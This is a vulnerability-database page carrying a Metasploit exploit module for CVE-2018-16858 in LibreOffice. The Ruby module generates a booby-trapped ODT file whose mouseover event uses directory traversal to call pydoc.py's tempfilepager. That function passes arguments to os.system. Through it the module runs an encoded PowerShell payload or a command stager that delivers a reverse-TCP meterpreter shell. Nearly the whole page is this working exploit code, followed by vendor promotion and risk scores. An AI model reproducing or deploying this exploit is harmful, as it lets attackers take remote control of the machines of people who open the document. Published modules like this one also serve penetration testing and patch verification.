Lucene search
K

LibreOffice Macro Code Execution

🗓️ 17 Apr 2019 00:00:00Reported by Alex InfuhrType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 112 Views

LibreOffice Macro Code Execution vulnerability allows RCE through mouseover event in ODT file

Related
Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Powershell  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'LibreOffice Macro Code Execution',  
'Description' => %q{  
LibreOffice comes bundled with sample macros written in Python and  
allows the ability to bind program events to them. A macro can be tied  
to a program event by including the script that contains the macro and  
the function name to be executed. Additionally, a directory traversal  
vulnerability exists in the component that references the Python script  
to be executed. This allows a program event to execute functions from Python  
scripts relative to the path of the samples macros folder. The pydoc.py script  
included with LibreOffice contains the tempfilepager function that passes  
arguments to os.system, allowing RCE.  
  
This module generates an ODT file with a mouse over event that  
when triggered, will execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Alex Inführ', # Vulnerability discovery and PoC  
'Shelby Pace' # Metasploit Module  
],  
'References' =>  
[  
[ 'CVE', '2018-16858' ],  
[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]  
],  
'Platform' => [ 'win', 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'Targets' =>  
[  
[  
'Windows',  
{  
'Platform' => 'win',  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'Payload' => 'windows/meterpreter/reverse_tcp',  
'DefaultOptions' => { 'PrependMigrate' => true }  
}  
],  
[  
'Linux',  
{  
'Platform' => 'linux',  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'Payload' => 'linux/x86/meterpreter/reverse_tcp',  
'DefaultOptions' => { 'PrependFork' => true },  
'CmdStagerFlavor' => 'printf',  
}  
]  
],  
'DisclosureDate' => "Oct 18, 2018",  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])  
])  
end  
  
def gen_windows_cmd  
opts =  
{  
:remove_comspec => true,  
:method => 'reflection',  
:encode_final_payload => true  
}  
@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)  
@cmd << ' && echo'  
end  
  
def gen_linux_cmd  
@cmd = generate_cmdstager.first  
@cmd << ' && echo'  
end  
  
def gen_file(path)  
text_content = Rex::Text.rand_text_alpha(10..15)  
  
# file from Alex Inführ's PoC post referenced above  
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))  
libre_file = ERB.new(fodt_file).result(binding())  
libre_file  
rescue Errno::ENOENT  
fail_with(Failure::NotFound, 'Cannot find template file')  
end  
  
def exploit  
path = '../../../program/python-core-3.5.5/lib/pydoc.py'  
if datastore['TARGET'] == 0  
gen_windows_cmd  
elsif datastore['TARGET'] == 1  
gen_linux_cmd  
else  
fail_with(Failure::BadConfig, 'A formal target was not chosen.')  
end  
fodt_file = gen_file(path)  
  
file_create(fodt_file)  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2019 00:00Current
9.1High risk
Vulners AI Score9.1
EPSS0.67547
112